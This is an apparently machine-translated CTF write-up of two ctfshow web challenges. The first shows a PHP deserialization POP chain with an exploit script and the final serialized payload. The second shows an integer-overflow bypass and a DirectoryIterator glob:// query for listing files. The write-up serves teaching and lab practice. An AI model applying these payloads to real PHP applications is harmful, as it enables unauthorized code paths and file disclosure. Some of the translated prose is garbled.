Ctfshow [King’s Cup] (Part I)

Time:2022-5-3

The competition ended as early as the end of February. In fact, I wanted to write WP for a long time, but there are many knowledge points that have not been written, so they have been delayed until now.

easy unserialize

<?php
/**
 * @Author: F10wers_13eiCheng
 * @Date:   2022-02-01 11:25:02
 * @Last Modified by:   F10wers_13eiCheng
 * @Last Modified time: 2022-02-07 15:08:18
 */
include("./HappyYear.php");

class one {
    public $object;

    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
}

class second {
    protected $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

if (isset($_GET["ctfshow"])) {
    $a=unserialize($_GET['ctfshow']);
    Throw new exception ("high school freshman report");
} else {
    highlight_file(__FILE__);
}

This topic has a lot of cold knowledge worth learning. Let’s have a look.

There are three classes, which can be seen at a glancepopChain, yesthrow new Exception();I knew I had to use itGC recovery mechanism。 I don’t know how to construct it yetPop chainOr I don’t knowGC recoveryWhat is it? You can see the article I wrote earlier

Serialization and deserialization of PHP (pop chain)_ Errorr0’s blog – blogOn the utilization of GC recovery mechanism in PHP_ Errorr0’s blog – blog

One of the more difficult points of this topic for me isPop chainIt’s hard to get together, that is to say, it can’t be seen at a glance. At this time, the idea of doing the problem is to find a magic method at random, and then analyze where to get to the magic method and where it will go.

First analyze some unpopular knowledge.

The first unpopular knowledge

__call($func, $args)and__get($name)How to control variables in:

<?php
class errorr0 {
    public $object;

    public function __construct()
    {
        $this->object = new errorr1();
        echo "__construct()\n";
        $this->object->string1;
    }
}
class errorr1 {
    public $filename;
    public function __get($a)
    {
        $this->filename = new errorr2();
        echo "__toString()\n";
		
		
        echo $a."\n";
        $this->filename->function1("bbb");
    }
}
class errorr2 {
    private $string;

    public function __call($a,$b)
    {
        echo "__call()\n";
		
		
        echo $a."\n";
		
        var_dump($b);
    }
}

$a = new errorr0();

?>

Ctfshow [King's Cup] (Part I)

It can be seen that if an inaccessible property is accessed and called__get()Method will pass the value of this property to__get()Parameters for.  __call()It is also a truth that if a non-existent or inaccessible function is called, the function name will be assigned to__call()For the first variable in the function, the value in the function will be assigned to the second parameter, as shown in the figure above.

The second unpopular knowledge

call_user_func();This function may be common, but if it’s thiscall_user_func([$this, $func.”Me”], $args);What if you don’t? That is, the first parameter is an array. Explain the test chart directly:

Ctfshow [King's Cup] (Part I)

You can see that if it is an array, the first parameter of the array is used as a class and the second parameter is used as a method. The following “world” is the parameter of the function.

The third unpopular knowledge

array_walk()function

Ctfshow [King's Cup] (Part I)

Ctfshow [King's Cup] (Part I)

Ctfshow [King's Cup] (Part I)

These are the two examples given in the rookie tutorial. You can understand the general meaning. I’d like to explain it in detail:array_walk()The first parameter is to select an array, and the second parameter is placed in a function. The two parameters in the function match the value and key of the selected array respectively. But!! The title gives a$thisWhat does it mean to traverse a class, that is, the parameter that should have matched the key will now match a variable as the key, and the value is the value that should have been. At this time, our operation is to modify the value to an array$fnBecome an array, and finally match$fn[0]Just pass it when you need it.

The fourth unpopular knowledge

In fact, this is a cold door, and the knowledge is far fetched. It may be a pit for me!!

Ctfshow [King's Cup] (Part I)

Ctfshow [King's Cup] (Part I)

As mentioned earlier,__get()In is a call caused by accessing an inaccessible property. The parameter value is the property that cannot be called$name=”string”, here comes the interesting one,$this->$name, you can see that I gave a red mark. It should have been$this->nameYes, but now it’s this, and$name=”string”, so in the end$var = $this->string

So in the end$this->string[‘string’]();, our goal is to make this thing pointone::MeMeMe()In the end, it was done. order$string = array(“string”=>[new one(),”MeMeMe”]);Even if you can bypass it, don’t ask me why. I don’t know. I think the official WP is like thisCtfshow [King's Cup] (Part I)

I think I should know what it means, but I know why it can be used like this for the first time. Just remember it can be used like this.

Construct exp

Since the difficulties and key points have been analyzed, the construction of exp is a simple way to get rid of those difficultiesPop chain。 After the analysis, I won’t go into detail, that is, fromone::__destruct()Method and then access the nonexistentadd()Triggersecond::__call()And then trigger its own functionsecond::addMe(), there is a point in it that can connect objects to strings, so connect toone::__toString(), and then access an inaccessible value to connectthird::__get(), finally arriveone::MeMeMe()

The constructed chain is: head — >one::__destruct() –> second::__call() –> second::addMe() –> one::__toString() –> third::__get() –> one::MeMeMe()–>Tail

exp:

<?php

class one {
    public $object;

    public $year_parm = array(0=>"Happy_func");

}

class second {
    public $filename;

}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

$a = new one();
$b = new one();
$c = new second();
$d = new third(["string"=>[new one(),"MeMeMe"]]);

$a->object = $c;
$c->filename = $b;
$b->object = $d;

$n = NULL;
$m = array(0=>$a,1=>$n);


echo serialize($m);

Ctfshow [King's Cup] (Part I)

These two squares are invisible characters, which I mentioned earlierPop chainAs mentioned in the article, the invisible characters here are%00

Change the following 1 to 0 to realize GC utilization.

The final string is:

a:2:{i:0;O:3:"one":2:{s:6:"object";O:6:"second":1:{s:8:"filename";O:3:"one":2:{s:6:"object";O:5:"third":1:{s:13:"%00third%00string";a:1:{s:6:"string";a:2:{i:0;O:3:"one":2:{s:6:"object";N;s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;s:6:"MeMeMe";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:0;N;}

Ctfshow [King's Cup] (Part I)

easyweb

Array key overflow + PHP native class reading. The amount of knowledge of the native class is a little large, which is supplemented by the notes later. The file operation in the native class tested here can be searched by Baidu.

Ctfshow [King's Cup] (Part I)

Front end source code promptsource, access the source code

Ctfshow [King's Cup] (Part I)

Pay attention to a problem. The first floor is here

Ctfshow [King's Cup] (Part I)

This is an equal sign, which is equivalent to assignment. For the case that the array cannot be assigned, it is OK when the key overflows. You can see that the previous sentence has++$cThat is, we set C toInt minus 1, after it increases, it can achieve the effect of overflow and non assignment, but I don’t know why I’m here127.0.0.1It can’t achieve the effect mentioned above. It can be tested on the server.

Ctfshow [King's Cup] (Part I)

 Ctfshow [King's Cup] (Part I)

 

Very clear, just make it clearc = 9223372036854775806Just add one overflow.

 

Next is PHP native class file reading.

Directoryiterator: the directoryiterator class provides a simple interface to view the contents of file system directories. Filesystemiterator: file system iterator.
Globiterator: iterates the file system in a similar way to glob ().

Just use one. I won’t elaborate on how to use Baidu directly.

The file name here is added with MD5. Although it can be blasted with burp, it is very smart to use regular matching for WP, so I’ll be lazy and copy it directly.

&a=DirectoryIterator&b=glob://flag[a-z0-9]*.php

Ctfshow [King's Cup] (Part I)

 

Last direct read:

Ctfshow [King's Cup] (Part I)

 

Recommended Today

The abstractmethoderror reported by springcloud Alibaba is caused by a version compatibility problem

When integrating Nacos, when using feignclient to request the interface, it will report abstractmethoderror. The first reaction is that this must be a version compatibility problem, but it also took a long time to solve the version compatibility. Try various versions The error is as follows: Caused by: java.lang.AbstractMethodError: org.springframework.cloud.netflix.ribbon.RibbonLoadBalancerClient.choose(Ljava/lang/String;Lorg/springframework/cloud/client/loadbalancer/Request;)Lorg/springframework/cloud/client/ServiceInstance; at org.springframework.cloud.openfeign.loadbalancer.FeignBlockingLoadBalancerClient.execute(FeignBlockingLoadBalancerClient.java:88) ~[spring-cloud-openfeign-core-3.0.3.jar:3.0.3] at feign.SynchronousMethodHandler.executeAndDecode(SynchronousMethodHandler.java:119) […]